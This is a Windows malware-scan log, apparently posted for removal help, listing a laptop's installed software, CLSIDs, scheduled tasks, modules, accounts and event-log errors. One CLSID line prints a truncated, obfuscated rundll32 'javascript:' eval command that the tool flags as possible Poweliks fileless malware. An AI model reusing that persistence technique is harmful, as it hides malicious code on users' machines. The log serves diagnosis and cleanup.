HP Update (HKLM-x32\...\{787D1A33-A97B-4245-87C0-7174609A540C}) (Version: 5.002.005.003 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{CCAFF072-4DDB-4846-963D-15F02A8E9472}) (Version: 13.00.0000 - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM-x32\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0.20.129 - InterVideo Inc.)
InterVideo WinDVD 8 (x32 Version: 8.0.20.129 - InterVideo Inc.) Hidden
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Fingerprint Software (HKLM\...\{2ED326C9-A4E6-4884-B3F0-9A6CFB0A1141}) (Version: 3.3.0.50 - AuthenTec, Inc.)
Lenovo Patch Utility 64 bit (Version: 1.4.0.4 - Lenovo Group Limited) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.04.05 - )
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.06.0016 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.0.020.0 - Lenovo)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Metric Collection SDK (x32 Version: 1.1.0005.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Small Business Connectivity Components (HKLM-x32\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Research AutoCollage Touch 2009 (HKLM-x32\...\{1F8DA253-3C27-4B01-A63A-BA3533120833}) (Version: 2.00.2009 - Microsoft Research)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mobile Broadband Connect (HKLM-x32\...\{5C111F14-D9BE-459D-B0B6-B4D082F03749}) (Version: 3.5.0006 - Lenovo)
Mozilla Firefox 22.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 22.0 (x86 en-US)) (Version: 22.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 22.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.00 - )
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.8 - Google, Inc.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.66.3 - Lenovo Group Limited)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
RICOH R5U8xx Media Driver ver.3.64.02 (HKLM-x32\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.64.02 - RICOH)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sanction Online Synchronization (HKLM-x32\...\Sanction Online Synchronization) (Version: 2.8 - SanctionII)
SanctionII (HKLM-x32\...\{135129F1-D9BF-42F4-9AF6-C1F5B10C3646}) (Version: 2.9.0 - Verdict Systems)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.1.4.0 - Lenovo Group Limited)
Skype™ 4.0 (HKLM-x32\...\{24D753CA-6AE9-4E30-8F5F-EFC93E08BF3D}) (Version: 4.0.227 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SyncUploader (HKLM-x32\...\SyncUploader_is1) (Version:  - Synchron Voice and Video, Inc.)
System Migration Assistant (HKLM-x32\...\{8A4DB1CA-8206-4ADC-805C-66ACF1611DA3}) (Version: 6.00.0009 - Lenovo Group Limited.)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9600 - Broadcom Corporation)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.41 - )
ThinkPad Modem Adapter (HKLM\...\CNXT_MODEM_HDA_HSF) (Version: 7.80.5.0 - Conexant Systems)
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.21 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.79.00.03 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Viewpoint Manager (Remove Only) (HKLM-x32\...\Viewpoint Manager) (Version:  - )
Viewpoint Toolbar (HKLM-x32\...\Viewpoint Toolbar) (Version:  - )
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 1.1.11 (HKLM-x32\...\VLC media player) (Version: 1.1.11 - VideoLAN)
Webcam Video Capture 4.8.0 (HKLM-x32\...\Webcam Video Capture_is1) (Version:  - Webcam Simulator)
Windows Driver Package - AuthenTec Inc. (ATSwpWDF) Biometric  (07/07/2009 8.1.2.56) (HKLM\...\8E6CE26AD682E6D46DCCDD39CD93277A2EAF2449) (Version: 07/07/2009 8.1.2.56 - AuthenTec Inc.)
Windows Driver Package - Intel System  (06/04/2009 1.0.0.0002) (HKLM\...\E7B58217635B8F723D4744A328A4B3237DB35FA9) (Version: 06/04/2009 1.0.0.0002 - Intel)
Windows Driver Package - Lenovo 1.55 (08/18/2009 1.55) (HKLM\...\112AA64E0C8CC704E307FE914F7DEC1C0035598E) (Version: 08/18/2009 1.55 - Lenovo)
Windows Driver Package - Ricoh Company (rimsptsk) hdc  (09/03/2009 6.10.01.05) (HKLM\...\5F72B7FA1792CB768F6A46E18A9DAD0E1FE1C863) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Driver Package - Ricoh Company (rismxdp) hdc  (09/03/2009 6.10.01.05) (HKLM\...\1FBDB507F002A372EB195A0ACF6E2A2F9D34689E) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Driver Package - Ricoh Company MMC Host Controller (09/03/2009 6.10.01.05) (HKLM\...\D50474ACAF488895A3CE5D30373288EA6AD46EAA) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

29-10-2014 15:14:51 Windows Update
29-10-2014 15:43:20 Removed AVG 2011
29-10-2014 15:47:21 Removed AVG 2011
29-10-2014 16:40:02 Installed AVG 2015
29-10-2014 16:40:39 Installed AVG 2015

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {10A8682B-DDFF-4C3F-94C8-6A7A09A3302A} - System32\Tasks\TVT\LenovoWERMonitor => C:\Program Files (x86)\Common Files\lenovo\SUP\sup_wermonitor_shim.exe [2014-09-01] ()
Task: {194D57F8-A314-4312-9BFC-D737D870ADCA} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21] (Adobe Systems Incorporated)
Task: {1A8F5B89-4B74-4727-9FF1-D36A55F8876D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2014-06-18] ()
Task: {30B5B2A6-F826-4565-92B4-8584E12E8F45} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {3844B652-7890-45EE-9DAB-B3EF1FBCD976} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2014-05-30] (Lenovo)
Task: {4B40D368-AC49-4DF8-8F12-D98D41F7BC6C} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {4C89DECB-CFF0-49E1-9246-7A1F8D318912} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe
Task: {54736606-5030-4C93-9F54-7EF26EFA8ADF} - System32\Tasks\1014avUpdateInfo => C:\ProgramData\Avg_Update_1014av\1014av_AVG-Secure-Search-Update.exe
Task: {574D660D-F9DC-47FF-8ADE-A988EF49C894} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-09-26] (Oracle Corporation)
Task: {5F681B2F-3464-4EC5-A163-3652DE9BF2F3} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-07-28] (Synaptics Incorporated)
Task: {5FB2CA78-42E5-4700-BF1C-63DE7D977FBB} - System32\Tasks\Message Center plus => C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: {6A771AE3-C6D9-4DF2-82A8-2C91380924E2} - System32\Tasks\HP online update program => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [2010-03-12] (Hewlett-Packard)
Task: {733FF5EE-2271-4FB4-8543-C8B19A1E0A61} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2014-02-13] (Lenovo)
Task: {7F1B8DB2-F8ED-4F7C-94DF-5D944A62F08B} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2014-09-10] (Lenovo Group Limited)
Task: {9711155E-F609-4429-9770-97F4DF706211} - System32\Tasks\HPCustParticipation HP Officejet Pro 8500 A910 => C:\Program Files\HP\HP Officejet Pro 8500 A910\Bin\HPCustPartic.exe [2010-06-14] (Hewlett-Packard Co.)
Task: {A552459E-DED6-4831-BA38-64227F19A6C6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)
Task: {CCE4B7E1-8686-4DAD-8B00-7457398BE82F} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {D03BED1A-E95C-4789-A641-D20C22D268FD} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {D6FD3C29-DF71-4519-B595-2EE6BBD3963C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)
Task: {EE7ADEAE-84E3-49E2-BBA6-54A8AE27C911} - System32\Tasks\Google Updater and Installer => C:\Users\Charles\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {F907CFFB-4805-4BBE-8877-7C9A90C1BEF2} - System32\Tasks\Divx online update program => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [2013-08-28] ()
Task: {F9A775E6-F9B2-4A78-85FE-CDE4DB114C90} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-09-01 02:36 - 2009-09-01 02:36 - 00117760 _____ () C:\Windows\system32\DTS.exe
2009-09-21 18:04 - 2009-09-21 18:04 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
2009-12-02 13:59 - 2014-09-10 06:06 - 00104960 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-07-01 21:54 - 2009-07-01 21:54 - 00173344 _____ () C:\Program Files\ThinkPad\Bluetooth Software\btkeyind.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 03037208 _____ () C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-14 17:47 - 2014-03-14 17:47 - 00092504 _____ () C:\Program Files (x86)\Lenovo\Access Connections\AcWrpc.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\log4cplusU.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 01685528 _____ () C:\Program Files (x86)\AVG Web TuneUp\TBAPI.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 40630296 _____ () C:\Program Files (x86)\AVG Web TuneUp\libcef.dll
2014-10-29 12:17 - 2014-10-29 12:17 - 00043008 _____ () c:\users\charles\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
2013-08-23 14:01 - 2013-08-23 14:01 - 25100288 _____ () C:\Users\Charles\AppData\Roaming\Dropbox\bin\libcef.dll
2013-08-06 12:43 - 2013-08-06 12:43 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:40F038C5
AlternateDataStreams: C:\ProgramData\TEMP:C74D7A47

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3094523011-22438472-3966868382-500 - Administrator - Disabled)
Charles (S-1-5-21-3094523011-22438472-3966868382-1003 - Administrator - Enabled) => C:\Users\Charles
Guest (S-1-5-21-3094523011-22438472-3966868382-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3094523011-22438472-3966868382-1005 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/29/2014 00:01:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: avgui.exe, version: 15.0.0.5557, time stamp: 0x544024b3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1788
Faulting application start time: 0xavgui.exe0
Faulting application path: avgui.exe1
Faulting module path: avgui.exe2
Report Id: avgui.exe3

Error: (10/29/2014 10:45:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/29/2014 10:45:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 21450

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 21450

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (10/28/2014 11:46:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.17116, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 10.0.9200.17116, time stamp: 0x541cda0b
Exception code: 0xc0000005
Fault offset: 0x000b9def
Faulting process id: 0xc4c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/28/2014 10:07:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.17116, time stamp: 0x4a5bc6b7
